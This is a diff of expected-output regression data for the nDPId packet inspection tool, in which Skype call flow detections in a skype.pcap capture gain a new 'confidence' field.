 01116{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1431969686992,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431969686992,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISTt8AAEARZ\/jAqAFc\/\/\/\/\/0RcRFwB\/v9VeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
 01111{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1431969686993,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431969686993,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISzasAAEARJoTAqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1431969687504,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431969687504,"pkt":"0NQSxnP1PBXCt3IOCABFAABBxOwAAEARHhbAqAEinTc4qDLdnEYALROCnIYCHY\/YUYokwK99l51ViNrnwr9nS0r47IMjMyFmHPRTFPvIVw=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1128,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1128,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1431969687504,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431969687504,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/rI8AAEAR6\/\/AqAEiQTffHTLdnEoAK4\/BnIgC0n2YTtpud4yFT0SZ+E2i0ODhSKmWbVLKl+n0TQ0fOTc="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1130,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1431969687504,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431969687504,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3NGcAAEAR+6bAqAEinTfrpjLdnE8AI+OWnIoCh50u5xbhS9toIKRfor72\/ZRTG\/Y\/lAII"}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1130,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1130,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1156,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1431969688514,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969688514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzhcAAEARLU\/AqAEib91NnzLdnEkALGRznIwCwyeMbMrdlUQ5AFonNJwRLd3E7Awg+gZSbquojb\/nyMcP"}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1156,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1156,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1431969688514,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969688514,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4ZaYAAEARmVXAqAEib91KEjLdgQkAJLX6nI4C1Tkw7dXubJLsc4XN4Hhz+Cr0PORpW0nsUg=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzR5AAEAGi+rAqAEinTeCrcOanEPZ9P\/0AAAAALAC\/\/+a6AAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1170,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -675,13 +675,13 @@
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7khAAEAGAdHAqAEinTfrnMOcnE7UANcqAAAAALAC\/\/9gqgAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zvgAAEARklXAqAEiQAQXlzLdnF0AJqz9nJAC1zV5OvO9upQBsUXmJpF2nBcsF0HuRy8JJIUg"}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1173,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5rSQAAEARguHAqAEinTfrrDLdnGAAJdphnJIChjRH4yCKz81IO5fkX1qSeV8SZKk7yqqsiNY="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1173,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1173,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyo54AAEARi\/LAqAEi1cezmDLdnFcAHjAjnJQCZ2daOJDdnSgXIMa0IqUKO\/m6pw=="}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1175,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1431969689525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969689525,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcG+JvVx7OOwKgBIpxDw5sesq08OgI9xqASOJCQMAAAAgQFrAQCCApQDL\/UPiNCegEDAwk="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1176,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1431969689525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969689525,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0n95AAEAGT8XAqAEi1cezjsObnEM6Aj3GHrKtPYAQECznJAAAAQEICj4jQrBQDL\/U"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1178,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1431969689543,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969689543,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxOw5wzprYh1ADXK6ASOJDpcAAAAgQFrAQCCApMWRmAPiNCegEDAwk="}
@@ -692,10 +692,10 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVDVAAEAGBNHAqAEinTeCsMOdnFaE5icqAAAAALAC\/\/\/EvgAAAgQFtAEDAwUBAQgKPiNGZAAAAAAEAgAA"}
